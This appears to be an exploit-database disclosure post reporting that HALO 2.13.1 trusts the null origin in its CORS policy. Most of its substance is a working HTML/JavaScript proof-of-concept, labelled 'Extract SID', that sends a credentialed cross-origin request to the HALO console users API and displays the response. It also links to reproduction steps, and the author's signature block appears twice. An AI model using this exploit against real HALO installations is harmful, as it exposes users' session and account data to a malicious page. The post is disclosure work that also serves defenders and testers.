Authored by nu11secur1ty

HALO version 2.13.1 has an insecure cross-origin resource sharing setting that allows an arbitrary origin.

## Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted
## Author: nu11secur1ty
## Date: 03/15/2024
## Vendor: https://www.halo.run/
## Software: https://github.com/halo-dev/halo
## Reference: https://portswigger.net/web-security/cors

## Description:
The application implements an HTML5 cross-origin resource sharing
(CORS) policy for this request that allows access from any domain.
The application allowed access from the requested origin null
The application allows two-way interaction from the null origin. This
effectively means that any domain can perform two-way interaction by
causing the browser to submit the null origin, for example by issuing
the request from a sandboxed iframe or malicious fishing domain with a
specially crafted HTML exploit.

STATUS: HIGH- Vulnerability

[+]Exploit:
```HTML
<html>
<body>
<center>
<h2>CORS POC Exploit
<h3>Extract SID

<div id="demo">
<button type="button" onclick="cors()">Exploit Click here
</div>

<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = alert(this.responseText);
}
};
xhttp.open("GET",
"http://192.168.100.49:8090/apis/api.console.halo.run/v1alpha1/users/-",
true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>

</body>
</html>

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/HALO/2024/HALO-2.13.1)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/halo-2131-cross-origin-resource-sharing.html)

## Time spent:
00:25:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

RELATED ARTICLESMORE FROM AUTHOR